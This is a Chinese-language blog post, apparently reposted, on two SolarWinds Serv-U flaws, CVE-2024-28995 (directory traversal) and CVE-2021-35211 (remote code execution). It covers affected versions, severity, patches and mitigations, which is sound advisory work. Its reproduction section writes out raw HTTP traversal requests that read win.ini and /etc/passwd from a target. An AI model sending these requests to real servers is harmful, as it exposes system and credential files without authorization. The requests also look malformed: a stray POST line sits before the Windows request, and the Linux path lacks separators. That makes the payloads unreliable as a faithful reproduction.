Serv-U 漏洞是否仍然存在?如何有效防范?

漏洞

SolarWinds Serv-U是一款FTP服务器软件,用于在Windows和Linux系统上设置和管理FTP服务,该软件提供了多种功能,以确保文件传输的安全性、效率和灵活性,Serv-U存在多个已知漏洞,其中两个主要漏洞包括目录遍历漏洞(CVE-2024-28995)和远程代码执行漏洞(CVE-2021-35211)。

Serv-U 漏洞是否仍然存在?如何有效防范?插图1

漏洞详情

CVE-2024-28995 目录遍历漏洞

漏洞描述:该漏洞是由于在处理路径时缺乏适当的验证,攻击者可以通过传递包含"../"的路径段绕过路径验证,访问任意文件。

影响版本:SolarWinds Serv-U FTP Server <= 15.4.2 Hotfix 1, SolarWinds Serv-U Gateway <= 15.4.2 Hotfix 1, SolarWinds Serv-U MFT Server <= 15.4.2 Hotfix 1。

风险等级:高危。

修复建议:升级到SolarWinds Serv-U FTP Server >= 15.4.2 Hotfix 2, SolarWinds Serv-U Gateway >= 15.4.2 Hotfix 2, SolarWinds Serv-U MFT Server >= 15.4.2 Hotfix 2。

CVE-2021-35211 远程代码执行漏洞

Serv-U 漏洞是否仍然存在?如何有效防范?插图3

漏洞描述:该漏洞为微软发现在野利用后向SolarWinds报告,并提供了漏洞利用的概念证明,未经身份验证的远程攻击者利用此漏洞可在受影响的服务器上以特殊权限执行任意代码。

影响版本:Serv-U 15.2.3 HF1及所有之前的版本。

风险等级:高。

修复建议:更新到Serv-U 15.2.3 HF2或更高版本。

漏洞复现

Windows平台复现

POST /formservice?service=u
GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Linux平台复现

Serv-U 漏洞是否仍然存在?如何有效防范?插图5

GET /?InternalDir=........etc&InternalFile=passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

临时缓解方案

确保对所有传入的InternalDir和InternalFile参数进行严格的路径验证,确保不包含任何目录遍历字符序列(如"../"或"..")。

在操作系统层面,限制Serv-U进程对敏感文件和目录的访问权限。

如非必要,不要将Serv-U FTP服务开放在公网上。

Serv-U的这两个漏洞都具有较高的风险等级,建议用户尽快应用官方提供的修补程序,以防止潜在的安全威胁,采取上述临时缓解措施可以在一定程度上降低风险,直到完成必要的升级。

到此,以上就是小编对于serv-u 漏洞的问题就介绍到这了,希望介绍的几点解答对大家有用,有任何问题和不懂的,欢迎各位朋友在评论区讨论,给我留言。

本文来源于互联网,如若侵权,请联系管理员删除,本文链接:https://www.9969.net/89557.html

小末小末
上一篇 2024年11月3日 19:36
下一篇 2024年11月3日 19:47

相关推荐